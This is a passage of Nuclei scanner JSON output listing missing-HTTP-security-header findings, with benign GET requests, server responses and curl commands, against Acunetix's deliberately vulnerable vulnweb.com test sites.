*/*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:06.574211166Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.574263745Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.574277442Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.717432946Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.717496069Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.717506738Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:06.717531207Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.003309541Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.149577836Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 